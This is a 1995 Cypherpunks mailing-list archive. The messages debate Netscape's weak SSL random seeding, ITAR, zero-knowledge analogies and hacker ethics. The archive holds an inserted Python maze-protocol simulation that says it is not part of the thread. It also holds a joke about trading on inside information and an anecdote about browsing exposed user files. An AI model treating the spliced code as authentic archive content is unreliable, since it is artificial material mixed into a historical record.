GIFs of the shirt will be available on the web page as soon as they are designed. (Times like these make me wish I owned a mac.) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From cme at TIS.COM Tue Sep 19 07:49:51 1995 From: cme at TIS.COM (Carl Ellison) Date: Tue, 19 Sep 95 07:49:51 PDT Subject: ftp://www.brooks.af.mil/pub/unix/utils/des.tar In-Reply-To: <199509182322.QAA03984@comsec.com> Message-ID: <9509191440.AA18495@tis.com> >From: Rich Salz >Date: Mon, 18 Sep 1995 13:11:46 -0400 > >Would someone from outside the US try to download the above file? >It would be, at least, amusing if an Air Force site were in violation >of the ITAR (their README notwithstanding). I know several people in the armed forces who are firmly on our side rather than Freeh's or NSA's -- so I wouldn't find it amusing to get a USAF person in trouble just because he/she is USAF. - Carl From cme at acm.org Tue Sep 19 07:50:29 1995 From: cme at acm.org (cme at acm.org) Date: Tue, 19 Sep 95 07:50:29 PDT Subject: Intellectual Property and Crypto collision In-Reply-To: <199509182307.QAA03892@comsec.com> Message-ID: <9509191443.AA22130@tis.com> >Date: Sun, 17 Sep 1995 13:20:06 -0700 >From: John Gilmore > >> ELECTRONIC MEDIA PROTECTED UNDER COPYRIGHT LAW >> A presidential task force has recommended that electronic transmission of [...] > >Would this make it illegal to produce tools for decrypting key-escrowed >software? :-) Yup -- except you will have volunteered. See the Feynman account (citation in http://www.clark.net/pub/cme/html/censor.html ) - Carl From sdw at lig.net Tue Sep 19 08:25:27 1995 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 19 Sep 95 08:25:27 PDT Subject: Unabomber ? In-Reply-To: <199509191330.JAA13584@pipe4.nyc.pipeline.com> Message-ID: Yep, it's big. 26 sections, 232 paragraphs, 36 notes, and one diagram. 
8 full newspaper pages in 5 column standard print (10 point?), ragged. Read the first page before work. > Bill, > > > Both the Times and Post report that only the Post is publishing > the FC-piece. > > > I'm scanning it now and will offer it in a while -- it's a > long, long pole. > > > I'll ask by this post if someone wants to offer it FTP, I can > only do multiple e-mail bites from this hole. > sdw From frissell at panix.com Tue Sep 19 08:29:34 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 19 Sep 95 08:29:34 PDT Subject: Cypherpunks Hold a Cracking Party Message-ID: <199509191529.LAA14949@panix.com> Just to let everyone know that I've got an assignment from Wired to do a story with the above working title. Since Wired is monthly it will be feature rather than news but will give a bit of an inside look at the process. I will be hitting various people up for help and would appreciate it if you send any URLs on the SSL and other such cracks to me. DCF "The freedom of the press belongs to the man who owns one." From frissell at panix.com Tue Sep 19 08:31:38 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 19 Sep 95 08:31:38 PDT Subject: (Yet Another?) 
Netscape Crack Web page Message-ID: <199509191529.LAA14933@panix.com> At 04:31 PM 9/19/95 +0200, Laurent Demailly wrote: > >I've been waiting to see here an annoucement of some web page toward >which direct ppl that want more infos on the great (congrats) job Here are some URLs I've collected: http://pauillac.inria.fr/~doligez/ssl/press-conf.html SSL challenge virtual press conference http://www.brute.cl.cam.ac.uk/users/pb/ Piete Brooks home page http://dcs.ex.ac.uk/~aba/ Adam Back's home page http://dcs.ex.ac.uk/~aba/brutessl/ Index of /~aba/brutessl/ http://www.brute.cl.cam.ac.uk/brute/ brute page DCF From andrew_loewenstern at il.us.swissbank.com Tue Sep 19 08:38:28 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Tue, 19 Sep 95 08:38:28 PDT Subject: NYT on Netscape Crack Message-ID: <9509191537.AA00830@ch1d157nwk> John Markoff in the NYT said: > The company said it would release a repaired version of the > software within a week. Does this sound to anyone else like a pretty short amount of time to code and test a decent source of entropy for the PRNG? <...and someone else said it should be out in a day or so!> Jeff Weinstein writes: > Regardless of what Markoff implies, we do not intend to depend > on security through obscurity. Oh, can we now expect to see source to at least the security portions of Navigator and the Commerce server? andrew From tbyfield at panix.com Tue Sep 19 08:44:18 1995 From: tbyfield at panix.com (t byfield) Date: Tue, 19 Sep 95 08:44:18 PDT Subject: WebSTAR "challenge" Message-ID: >From TidBITS#295/18-Sep-95 >**This is a test. This is only a test.** The folks behind the book > _WebMaster_Macintosh_ have set up a contest to determine how > secure Macintosh web servers really are. They've put up a Web site > running WebSTAR with a "target" file that contestants must try to > retrieve. 
The first person to retrieve the file wins a year's > subscription to MacTech Magazine and a free pass to the next > WebEdge conference, and the next two people receive free WebEdge > passes. If the challenge of breaking WebSTAR's security isn't > sufficient, there's a second Mac connected to the first via > Ethernet. This second Mac doesn't run TCP/IP, only AppleTalk, and > holds a second target file; retrieving it wins you three free > WebEdge passes. The hope is that these tasks will prove > impossible, however, should someone break in, that's also useful > since it will help StarNine and Apple plug security holes. Contest > rules and details are at: [ACE] > >http://www.webmastermac.com/security/ From hallam at w3.org Tue Sep 19 08:49:43 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 19 Sep 95 08:49:43 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190703.DAA03247@clark.net> Message-ID: <9509191548.AA17659@zorch.w3.org> I take a long term view of security. Basically I don't trust security software until it has been released in a stable condition for a few years. The comments about Credit Card numbers miss the point. The volumes of trade on the Internet today are so small that the number of card numbers floating around is insignificant. There are much easier ways to find them than cracking the Internet. This will not be the case in a couple of years' time when the trade volumes are far higher. Visa and Mastercard will be coming out with a spec which will have very tight requirements for implementations. Phill From hfarkas at ims.advantis.com Tue Sep 19 08:53:18 1995 From: hfarkas at ims.advantis.com (Henry W.
Farkas) Date: Tue, 19 Sep 95 08:53:18 PDT Subject: Fundamental Netscape hack In-Reply-To: <199509190954.CAA24686@ix.ix.netcom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 19 Sep 1995, Bill Stewart wrote: > Of course, one of the most serious security problems with Netscape servers > is that they run on machines sitting out there on the Internet where > anybody who can browse their services can attack them - that 128-bit > bullet-proof iron-clad front door isn't much help if the garage door is > unlocked because of some sendmail bug. Or- even easier yet- improper httpd installation or users who have not been properly trained. NCSA's default configuration file makes document root a subtree. One major institution I deal with regularly (and the administrators should know better) changed the default setting, allowing users to store html files in their home directory. And, it seems, the file permissions were too lax. If a user had no index.html then I could just cruise through their home directory, view most files and, in some (inappropriate) cases, download them. I told the administrator, and mailed him a copy of a user's address book (she was a friend and knew what I was doing before I did it). The situation has changed and is now more secure. But I wonder how many other institutions have an inappropriate DocumentRoot so (I guess) users can have a "single home directory"? =========================================================================== Henry W. Farkas | Me? Speak for IBM? Fat chance. hfarkas at ims.advantis.com |------------------------------------------------ hfarkas at vnet.ibm.com | http://newstand.ims.advantis.com/henry henry at nhcc.com | http://www.nhcc.com/~henry - --------------------------------------------------------------------------- PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52 B3 80 34 1C CE 38 EC 53 Public key at: pgp-public-keys at pgp.mit.edu, and other popular key servers. 
- --------------------------------------------------------------------------- Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not fast, but it's not bad, and we're cheaper than the guy down the street!" =========================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta iQCVAwUBMF7nGKDthkLkvrK9AQEIbwQAl7k86Tk4gY/KU9JYS4lyI63fH4lJYTHw +Pl85cx3M/RI/kO8N9ZaUih4Hh+8CnNl7xA6NWtURfcSuCCgW3mrdRbKT8KTW/3M hohmv3yyyU2Ot24B4hb2/lZN5s/fR2JMdsWhKoZdm19xnlQIMBjidP6zxcavE/JC GNbJm94mBIA= =L0lD -----END PGP SIGNATURE----- From sameer at c2.org Tue Sep 19 09:01:41 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 09:01:41 PDT Subject: SFChron Message-ID: <199509191556.IAA09022@infinity.c2.org> 'Security Hole Found in Netscape Software' C1.4 C4.1 Choice quotes: "But the breach raises the issue whether Netscape's software...will ever be safe enough..." "Mike Homer, vice president of marketing for Netscpae, said that recent breaches do not mean the products are flawed" "But if Netscape thinks one patch is all it will take, they are mistaken, said Sameer Parekh" -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From fair at clock.org Tue Sep 19 09:04:52 1995 From: fair at clock.org (Erik E. Fair (Time Keeper)) Date: Tue, 19 Sep 95 09:04:52 PDT Subject: Verification of Random Number Generators Message-ID: At 2:20 9/19/95, Eric Young wrote: >Now I had not noticed this, my library runs like a charm and things >appear random from the random number generator. This sort of error can >only be checked by reading the code and specifically looking at critical >routines like this the RNG seeding routines. The advantage of my code >being public is that some-one like Mike can have a look and pick up >problems like this. 
>The moral of the story I suppose is to be >paranoid about checking routines relating to RNG. Just an idle thought: it might be possible to do a probabalistic verification of a RNG by sampling it over some number of samples, and statistically analyzing the sample space. This would be analysis under the model of "RNG as black box" as opposed to (or rather, if you're smart, in addition to) code inspection & review. Any statisticians among us? Erik Fair From iagoldbe at csclub.uwaterloo.ca Tue Sep 19 09:35:25 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Tue, 19 Sep 95 09:35:25 PDT Subject: Random publicity was: articles In-Reply-To: <199509191435.HAA00275@infinity.c2.org> Message-ID: <43mrf2$arr@calum.csclub.uwaterloo.ca> In article <199509191435.HAA00275 at infinity.c2.org>, sameer wrote: > If you could, please send me the name of the reporter and >contact information for any articles you see regarding the netscape >hack. > >Thanks, >-- >sameer Voice: 510-601-9777 >Community ConneXion FAX: 510-601-9734 >An Internet Privacy Provider Dialin: 510-658-6376 >http://www.c2.org (or login as "guest") sameer at c2.org So far, I talked to the NYT and the WSJ yesterday, as well as the SF Chronicle. This morning, one of the University's publicity people forwarded Marketplace (a radio show) and CNN (sending a camera crew) to me. I've also received email from various people, including someone who works in security at the Pentagon. I wonder if I should tell them I'm not an American? - Ian "but I'm Canadian, so that's the same thing, right?" :-( From eli at UX3.SP.CS.CMU.EDU Tue Sep 19 09:51:00 1995 From: eli at UX3.SP.CS.CMU.EDU (Eli Brandt) Date: Tue, 19 Sep 95 09:51:00 PDT Subject: Explaining Zero Knowledge to your children In-Reply-To: <9509181655.AA06115@elysion.iaks.ira.uka.de> Message-ID: <9509191650.AA21716@toad.com> Hadmut Danisch suggested: > Alice is caught in a dark room somewhere on the world. 
She doesn't know > where she is, but there is a telephone in the room and she calls Bob to > ask him where she is. Bob claims to know it but doesn't want to reveal. > He calls her back. When the phone is ringing, he has proven the knowledge I don't think this captures the structure of a ZNP. There's no multi-round system, for one thing. how about this: Alice and Bob have a big, complicated maze, preferably non-planar. Alice can solve the maze, and wants to prove this to Bob. Alice picks a point P on a solution path. Bobs asks Alice to (a) exhibit a path from Start to P. or (b) exhibit a path from P to Finish. Alice can easily do either one. If Alice doesn't know the maze, she can try to cheat, by picking a P by tracing forwards from Start, or by tracing backwards from Finish. These ploys allow her to sleaze through tests (a) and (b) respectively. But if Bob flips a coin to select (a) versus (b), he has a 50-percent chance of catching with each round. This is not really zero-knowledge. With each round, Alice is giving Bob substantial knowledge about the maze. With sufficient rounds, she ends up giving him the whole thing. But if the maze is hairy enough, this captures the idea that Alice can prove (to within epsilon) to Bob that she has a solution, without giving it away entirely. -- Eli Brandt eli+ at cs.cmu.edu From tcmay at got.net Tue Sep 19 09:51:07 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 19 Sep 95 09:51:07 PDT Subject: Why Surveillance State Needs Toy Crypto Message-ID: At 8:19 AM 9/19/95, Christian Wettergren wrote: >What I don't understand is why the law-enforcement is so concerned >about bruting things. It is probably quite easy to tap the keyboard, >smart force, exchange the binary with the real thing etc for them? > >(Unless they want to read it all from a nice tipped-back armchair in >a certain location? 
:-)) > >What I'm saying is that this kind of attack should work quite easily >in the one-by-one cases, but not on a large scale, malicious data, >trojan horses, outright bugging. So why all this Clipper (son-of-X) >fuss? It's really about the threat model. Sure, the authorities _could_ place microphones in offices and homes, but this requires huge amounts of effort and is only justified when the target is really, really important. As Whit Diffie has said (and this makes about the fifth time I've credited him on this, so I hope he's satisfied), widespread surveillance must attack the communication channels, not just attack the origins and destinations. That is, the _economics_ of mandating weak crypto are vastly more efficient for the surveillance state. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Tue Sep 19 09:51:14 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 19 Sep 95 09:51:14 PDT Subject: Investing on Information We Get Here Message-ID: At 1:35 PM 9/19/95, Duncan Frissell wrote: >At 11:00 PM 9/18/95 -0400, John Young wrote: >> The New York Times, September 19, 1995, pp. A1, D21. >> >> >> Security Flaw Is Discovered In Software Used in Shopping >> >> By John Markoff > >On the Front Page, *above* the fold. Perhaps John was trying to make up for >being scooped by the WSJ on the SSL Crack story. Also front page, above the fold, for the "San Jose Mercury News," the newspaper of record of the Silicon Valley. And CNBC is reporting the story on its hourly updates of the news. (These computer lists are really great for investors! 
I heard about the Apple problems a few days before they hit the street, and was able to unload a bunch of shares at $45, a day before it dropped, now down to around $36. "He who hesitates to act on inside information is lost.") P.S. On Netscape, I've finally decided to do some buying. Sure, this latest flaw is another embarrassment. But more deals and link-ups than ever are being inked, and they've got the resources to really spruce up Navigator and related products. I just don't see too many competitors on the horizon. Actually, I was planning to buy some Netscape stock, now that the IPO froth has settled. And since I have this info on the flaw, I _have_ to buy it, else be guilty of "insider non-trading." As Stew Brownstein, a friend of mine, has noted, if insider trading rules are interpreted logically, then _failure_ to make a planned trade on the basis of insider information is just as illegal as deciding to make some trade on the basis of insider information. The SEC should require all insiders to file a daily report, preferably before the market opens in NY, listing all of their planned transactions for that day, so that violations of the "insider non-trading" laws can be detected and prosecuted. (Yes, I know that I am not an "insider" by SEC definitions. Poetic license.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." 
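Eli Brandt's maze protocol (in his "Explaining Zero Knowledge to your children" post above), simulated as an added example that is not code from the thread: an honest prover who knows the whole route answers every challenge, while a prover who only traced forward from Start or back from Finish is caught with probability 1/2 per round. The maze, the cheater's partial knowledge and the round counts are constructed assumptions; the run also tallies what Bob learns, which is why Eli says it is not really zero-knowledge.

```python
"""Eli Brandt's maze proof, simulated (added example, not code from the thread).
The maze, the cheater's partial knowledge and the round counts are constructed."""
import random
from typing import Dict, List, Optional, Set, Tuple

Maze = Dict[str, Set[str]]          # undirected adjacency lists
START, FINISH = "S", "F"
SOLUTION = ["S", "a", "b", "c", "d", "e", "F"]   # the one Start->Finish route


def make_maze() -> Maze:
    """Constructed maze: the solution corridor plus a few dead-end branches."""
    edges = [("S", "a"), ("a", "b"), ("b", "c"), ("c", "d"), ("d", "e"), ("e", "F"),
             ("a", "x1"), ("x1", "x2"), ("c", "y1"), ("e", "z1"), ("z1", "z2")]
    maze: Maze = {}
    for u, v in edges:
        maze.setdefault(u, set()).add(v)
        maze.setdefault(v, set()).add(u)
    return maze


def valid_path(maze: Maze, path: Optional[List[str]], src: str, dst: str) -> bool:
    """Bob's check: a walk over adjacent cells that starts at src and ends at dst."""
    if not path or path[0] != src or path[-1] != dst:
        return False
    return all(v in maze.get(u, set()) for u, v in zip(path, path[1:]))


class HonestProver:
    """Alice, who really knows a Start->Finish path."""
    def __init__(self, solution: List[str]):
        self.solution = solution

    def commit(self, rng: random.Random) -> str:
        return rng.choice(self.solution)          # any P on her path

    def respond(self, challenge: str, p: str) -> Optional[List[str]]:
        i = self.solution.index(p)
        return self.solution[: i + 1] if challenge == "a" else self.solution[i:]


class CheatingProver:
    """Knows only a stretch traced forward from Start and one traced back from Finish."""
    def __init__(self, prefix: List[str], suffix: List[str]):
        self.prefix, self.suffix = prefix, suffix

    def commit(self, rng: random.Random) -> str:
        # She must commit to P before seeing the coin, so she gambles on one side.
        return rng.choice(self.prefix + self.suffix)

    def respond(self, challenge: str, p: str) -> Optional[List[str]]:
        if challenge == "a" and p in self.prefix:
            return self.prefix[: self.prefix.index(p) + 1]
        if challenge == "b" and p in self.suffix:
            return self.suffix[self.suffix.index(p):]
        return None                               # cannot exhibit the demanded path


def run_protocol(maze: Maze, prover, rounds: int,
                 rng: random.Random) -> Tuple[bool, Set[str]]:
    """Bob's side. Returns (accepted, cells Bob has seen); the second value is
    the knowledge leak that makes this 'not really zero-knowledge'."""
    revealed: Set[str] = set()
    for _ in range(rounds):
        p = prover.commit(rng)
        challenge = rng.choice("ab")              # Bob's coin flip
        path = prover.respond(challenge, p)
        src, dst = (START, p) if challenge == "a" else (p, FINISH)
        if not valid_path(maze, path, src, dst):
            return False, revealed
        revealed.update(path)
    return True, revealed


def honest_run(rounds: int, seed: int = 7) -> Tuple[bool, Set[str]]:
    """Honest Alice against Bob for the given number of rounds."""
    return run_protocol(make_maze(), HonestProver(SOLUTION), rounds, random.Random(seed))


def cheater_escape_rate(trials: int, rounds: int, seed: int = 1) -> float:
    """Fraction of runs in which the cheater survives every round (expect 2**-rounds)."""
    rng = random.Random(seed)
    maze = make_maze()
    cheat = CheatingProver(SOLUTION[:3], SOLUTION[4:])   # knows S-a-b and d-e-F only
    escaped = sum(run_protocol(maze, cheat, rounds, rng)[0] for _ in range(trials))
    return escaped / trials


if __name__ == "__main__":
    ok, seen = honest_run(50)
    print("honest prover accepted:", ok, "| cells Bob now knows:", sorted(seen))
    for n in (1, 5, 20):
        print(f"cheater escapes {n} round(s) with rate", cheater_escape_rate(2000, n))
```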
From aba at dcs.exeter.ac.uk Tue Sep 19 09:55:48 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Tue, 19 Sep 95 09:55:48 PDT Subject: NYT on Netscape Crack Message-ID: <155.9509191654@exe.dcs.exeter.ac.uk> Andrew Loewenstern writes: > Jeff Weinstein writes: > > Regardless of what Markoff implies, we do not intend to depend > > on security through obscurity. > > Oh, can we now expect to see source to at least the security portions of > Navigator and the Commerce server? An excellent proposal. Well how about it Jeff/netscape? Save Ian and David the effort of reverse engineering it again (which it is obviously pointless, and more: mathematically impossible, to do), and get your self some free advice. Better to have free advice, and quickly now, rather than another disaster later, presume netscapes cred can't take too many more bashings before this starts affecting share prices etc. Posting the code for the random number generator would be an excellent start. Kirkov (sp?) principle and all. Or if that doesn't sit well with copyright interests, how about writing up an open spec about how the random number generator works? Then we can critique it. An algorithm should be something to be proud of, "it's secure, and see: this is how it works, here are the design criteria, here is how you would attempt to break it, and here is the best predicted attack's cost." Lets get something useful out of this, an open system is called for not just a quick switcheroo of another algorithm. Open systems, rule! (I thought netscape was big on open systems, reading some of the blurb, just now). I'm sure you'd get some useful, valuable feed back from publishing an open spec, is netscape still a progressive startup company with hot programmers running the show, or has it slipped into stuffy corporate realms already? 
Respectfully, Adam From andrew_loewenstern at il.us.swissbank.com Tue Sep 19 09:58:16 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Tue, 19 Sep 95 09:58:16 PDT Subject: Verification of Random Number Generators Message-ID: <9509191654.AA00901@ch1d157nwk> > Just an idle thought: it might be possible to do a probabalistic > verification of a RNG by sampling it over some number of samples, > and statistically analyzing the sample space. This would be analysis > under the model of "RNG as black box" as opposed to (or rather, if > you're smart, in addition to) code inspection & review. Any > statisticians among us? But this wouldn't have solved Netscape's problem. Netscape was using a pretty good PRNG (the one in RSAREF). The problem was they were/are using a naive method of seeding it. The output of the PRNG would have been statistically random, but since the seed had ridiculously little entropy it was easy to guess. andrew From sunder at dorsai.dorsai.org Tue Sep 19 10:01:59 1995 From: sunder at dorsai.dorsai.org (Ray Arachelian) Date: Tue, 19 Sep 95 10:01:59 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: Message-ID: On Mon, 18 Sep 1995, Steven Levy wrote: > No chance. The problem for me isn't that someone wanted to call a movie > Hackers but that it causes confusion in that for eleven years there has > been a preexisiting work by that name. There is a novelization of the > screenplay now in paperback, so when if a friend recommends that you buy > Hackers, you'll probably buy that one. (especially since Dell is > determined to do as little as possible for my own book). Or vice versa. Someone could want to get the book based on the movie and wind up buying your book - thereby benefiting you instead of Dell or whomever is publishing the one based on the screen play. I wouldn't worry over it. :-) It may turn out that this will cause your book to suddenly surge. 
========================================================================== + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | _ |> \|/ |sunder at dorsai.org| Where day by day, yet another | \ | <--+-->| | Constitutional right vanishes. | \| /|\ | Just Say | | <|\ + v + | "No" to the NSA!| Jail the censor, not the author!| <| n ========================================================================== From bdavis at thepoint.net Tue Sep 19 10:02:12 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 19 Sep 95 10:02:12 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: <9509170429.AA05221@zorch.w3.org> Message-ID: On Sun, 17 Sep 1995 hallam at w3.org wrote: > > >I saw "Hackers" yesterday. It's not bad and its political sensibility is > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime > >is curiosity." > > I know companies who have spent millions cleaning up after a hacker breakin. > I've been up at two in the morning trying to stop a person with known mental > problems breaking into a site with some very dangerous computer controlled > machinery. I've dealt with people trying to get rich quick by defrauding others. > I've met some real evil bastards who simply want to ruin as many other peoples > lives as they possibly can, including people that thought they were their > friends. > > To me teenagers who break into computer systems are not funny at all, its like > joyriding, its funny until someone gets hurt. I know people who have got hurt > real bad. > > I like having privacy, part of the cost of that privacy is respecting the > privacy of others. > > Phill > Phill obviously presents one point of view, vigorously and well. What do the rest of you think about a teen who, say, busts into a .edu site, plays with the files, and ultimately brings the system down entirely for 36 hours? Fun and games? Send him to his room, sans modem? Prosecute him? Have a TLA hire him??? 
Not an easy answer for me for "mere trespass," but as damage mounts, it becomes easier. I'll try to post later tonight on my prior key escrow question. EBD Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From mark at unicorn.com Tue Sep 19 10:14:30 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Tue, 19 Sep 95 10:14:30 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: On Sun, 17 Sep 1995, Brian Davis wrote: > Phill obviously presents one point of view, vigorously and well. What do > the rest of you think about a teen who, say, busts into a .edu site, > plays with the files, and ultimately brings the system down entirely for > 36 hours? Fun and games? Send him to his room, sans modem? Prosecute > him? Have a TLA hire him??? If it wasn't for ITAR the Net would already have secure encryption and authentication, and most such hacker attacks would be impossible (or at least impractical). Mark From andrew_loewenstern at il.us.swissbank.com Tue Sep 19 10:39:18 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Tue, 19 Sep 95 10:39:18 PDT Subject: NYT on Netscape Crack Message-ID: <9509191738.AA00941@ch1d157nwk> Adam Back writes: > Posting the code for the random number generator would be an > excellent start. Ian posted the code for the PRNG on August 30th and Stephen Kapp noted that it was similar to one in RSAREF. The PRNG is probably fine. The big flaw here was the collection of seed material. The bottom line is the WHOLE security subsystem should be published for analysis. > Or if that doesn't sit well with copyright interests, how about > writing up an open spec about how the random number generator works? > Then we can critique it. Netscape did this with SSL and what happened was the rest of the industry jumped on it before any analysis was done. Now we are likely stuck with a poor protocol. 
> An algorithm should be something to be proud of, "it's secure, and > see: this is how it works, here are the design criteria, here is > how you would attempt to break it, and here is the best predicted > attack's cost." The design may be great, but if the implementation is flawed then you aren't much better off. To attempt to evaluate the security of a system you need to be able to inspect the implementation. Period. > is netscape still a progressive startup company with hot programmers > running the show, or has it slipped into stuffy corporate realms > already? Netscape may have hot programmers but so far I believe it has become self-evident that they know little about crypto and implementing cryptosystems. To Netscape's credit, Jeff Weinstein claims that the team implementing the security for Navigator 2.0 is completely new and of course Netscape has hired Tahir ElGamal, who certainly knows what he is doing. Additionally I would suspect that with all the bad publicity they are receiving they would take up Bidzos on RSADSI's offer to analyze the source. So it is entirely possible that Navigator 2.0 will be much better. However, I am not holding my breath. Strong crypto is _hard_ to implement properly. Even if a product is using a well-known algorithm there could be any number of subtle flaws that can destroy any security offered by such algorithm. You can't just toss in RSA, IDEA, RC-4, DES, etc... and claim the thing is secure. andrew From tcmay at got.net Tue Sep 19 10:46:24 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 19 Sep 95 10:46:24 PDT Subject: Mini-mailbombs and Warning Letters Message-ID: (This is not about MIME, but the astute reader will see some parallels...) I've received a couple of "automatically generated" pieces of e-amil which tell me that, in the generator's opinion, something is wrong with my public key, or it could not be found at the keyserver preferred by the owner of the mail generator, etc. 
Quoting from the latest: (identity of generator owner witheld) "P.S. This mail was composed by my mailreading sftwr, which automatically scans incoming mail, looking for failed keyserver requests, and prompts me whether it should automatically send this msg on my behalf. If there is a bug w this sftwr (for example, you never PGP sign your msgs, so this entire msg makes no sense), or if you're interested in the software itself (mail-secure.el: a package in lisp for emacs; this is just one of the many crypto/privacy related things it does) please mail the author of this package ( tjic at openmarket.com ) for details." As the saying goes, "Sigh." Being on a list with 700 subscribers, some of whom are running increasingly sophisticated automatic checking agents, I foresee an increase in these "warning letters" from their checking agents who feel posts are not adequate in some way. A minor issue, but symptomatic of trends. I'm dealing with it the same way I'm dealing with the few people who have something in their MIME setup that triggers my mailer (Eudora Pro 2.1) to treat their text as attachments. Namely, by filtering them out. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From danisch at ira.uka.de Tue Sep 19 10:53:26 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 19 Sep 95 10:53:26 PDT Subject: Avoiding weak IDEA keys? Message-ID: <9509151215.AA00774@elysion.iaks.ira.uka.de> At the CRYPTO '93 there was a presentation about weak IDEA keys (page 224 of the proceedings). Does anybody know about IDEA implementations considering this and trying to avoid weak keys, e.g. 
by using the modified key schedule? Hadmut From bdavis at thepoint.net Tue Sep 19 10:54:27 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 19 Sep 95 10:54:27 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: Message-ID: On Tue, 19 Sep 1995, Rev. Mark Grant wrote: > On Sun, 17 Sep 1995, Brian Davis wrote: > > > Phill obviously presents one point of view, vigorously and well. What do > > the rest of you think about a teen who, say, busts into a .edu site, > > plays with the files, and ultimately brings the system down entirely for > > 36 hours? Fun and games? Send him to his room, sans modem? Prosecute > > him? Have a TLA hire him??? > > If it wasn't for ITAR the Net would already have secure encryption and > authentication, and most such hacker attacks would be impossible (or at > least impractical). > > Mark The non-responsive answer is stricken from the record. :-) You mean "secure" as Netscape was secure from sameer et al.? Apples and oranges answer to my perhaps-not-so-hypothetical question. Still waiting for a serious response ... Brian From lethin at ai.mit.edu Tue Sep 19 11:03:34 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Tue, 19 Sep 95 11:03:34 PDT Subject: unabomber paper Message-ID: <199509191803.OAA15542@grape-nuts.ai.mit.edu> is available on http://www.ai.mit.edu/misc/unabomber From aba at dcs.exeter.ac.uk Tue Sep 19 11:08:54 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Tue, 19 Sep 95 11:08:54 PDT Subject: NYT on Netscape Crack In-Reply-To: <9509191738.AA00941@ch1d157nwk> Message-ID: <429.9509191807@exe.dcs.exeter.ac.uk> Andrew Loewenstern writes: > Ian posted the code for the PRNG on August 30th and Stephen Kapp > noted that it was similar to one in RSAREF. The PRNG is probably > fine. Yeah I saw both. > The big flaw here was the collection of seed material. This was what I was trying to say. 
I was thinking that it would be useful if they would care to disclose this part of the implementation, where the entropy comes from, and how they estimate it. > The bottom line is the WHOLE security subsystem should be published > for analysis. Absolutely, but can you see netscape adopting the GPL, with full source availability? Of course this would be ideal, but I was hoping for at least the source as pertaining to the random number generator which is the essence of the current problem. > > Or if that doesn't sit well with copyright interests, how about > > writing up an open spec about how the random number generator works? > > Then we can critique it. > > Netscape did this with SSL and what happened was the rest of the industry > jumped on it before any analysis was done. Now we are likely stuck with a > poor protocol. Yeah well if open systems is taken to mean, we make up a standard, tell you about it and if you don't like it well it's too late because we've blasted it across the internet to the extent that there's no turning back. An approach more in keeping with the IETF frame work would have been better. If it's open standards why not accept existing standards, or contribute to a IETF working group to decide one which is agreed upon. I'd call that more open. > > An algorithm should be something to be proud of, "it's secure, and > > see: this is how it works, here are the design criteria, here is > > how you would attempt to break it, and here is the best predicted > > attack's cost." > > The design may be great, but if the implementation is flawed then > you aren't much better off. To attempt to evaluate the security of > a system you need to be able to inspect the implementation. Period. Well yes, but the current flaw the design wasn't even correct, although the implementation of that design was. 
